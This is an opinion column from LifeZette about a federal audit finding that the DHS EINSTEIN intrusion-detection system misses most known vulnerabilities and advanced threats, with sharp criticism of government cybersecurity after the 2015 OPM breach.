By Steve King, LifeZette:
Federal agencies remain extremely vulnerable cyber targets two years after OPM breach
According to a sanitized version of a secret federal audit, the firewalls operated by the Department of Homeland Security, meant to detect and prevent nation-state attacks, are completely ineffective. The audit found the federal government’s primary perimeter defense system, known as EINSTEIN, depends only on known patterns of attack (signature detection) to spot suspicious traffic and fails to detect 94 percent of commonly known vulnerabilities — or even check web traffic for malicious content.
In addition, the audit discovered that the prevention feature of the system is only deployed at five of the 23 major nondefense agencies, one of which was the Office of Personnel Management.
The auditors’ findings included the conclusion the $6 billion DHS system does not combat hackers, nor “should it be relied on to provide effective cybersecurity-related support to federal agencies.” They went on to say that “The overall intent of the system was to protect against nation-state level threat actors,” yet EINSTEIN completely missed these so-called advanced persistent threats, which are commonly used by nation-state actors.
EINSTEIN “did not possess intrusion-detection signatures that fully addressed all the advanced persistent threats we reviewed,” the authors of the audit said.
The zero-day attack that blew through EINSTEIN’s defenses at the Office of Personnel Management in 2015 is a classic example of the type of attack that our current federal government defenses cannot handle. News flash: Zero-day attacks are the only attacks that the private sector is concerned with today. All of the “signature-based” attacks are already handled by various cybersecurity technologies. Someone at DHS might want to look outside the confines of the Washington swamp.
Most of today’s advanced cyber-attacks hide in network flows and cannot be seen or detected by EINSTEIN because the system instead relies on manual intervention by way of adding signatures after a malicious attempt is unearthed. This cave-dwelling approach guarantees that zero-day attacks by definition will always be successful against our national cyber defense system.
To make matters worse, the Obama administration’s vaunted information sharing-initiatives are now found to be essentially worthless, according to GAO officials. The IT infrastructures at each agency differ, and EINSTEIN apparently must be tailored to each separate environment. One complaint held that EINSTEIN would disrupt their agency’s email system.
DHS’s information-sharing initiatives have met with frequent disagreements among agencies about the number of notifications sent and received and their usefulness,” according to the GAO auditors.
The agencies claim they received only a quarter of the notifications Homeland Security said it had sent in the audited period, and the ones that did reach them served no purpose, according to the audit. Of the alerts that were communicated successfully, almost half were too slow, useless, false alarms, or unrelated to intrusion detection.
Meanwhile, as seasoned Washington observers might have guessed, the DHS has created a variety of metrics related to EINSTEIN, but “none provide insight into the value derived from the functions of the system,” the auditors said.
I don’t have to tell anyone reading this that if only a tiny bit of this incompetence occurred in the private sector, even at non-profits, heads would roll. It may be understandable if we shrugged if a government agency screwed up dealing with say, climate change, but are we really going to ignore this level of dangerous disregard for our national defense? What if our military started to behave like the troops in Stripes or Down Periscope? Would that be funny?
This is not funny. Heads should roll. And, this President needs to quickly understand that the vast government under his charge is protected by antiquated technology and failed detection and prevention techniques, surrounded by bureaucrats who make a living covering their own interests while the rest of ours are hung out as targets.
Homeland Security now says they weren’t required to link up the signatures with the vulnerability database but that they acknowledge the deficiency and plan to address it soon in the future, according to the audit response. Soon, but in the future. Sometime. Later. Maybe. Because, you know. They weren’t required.
Read related content at LifeZette.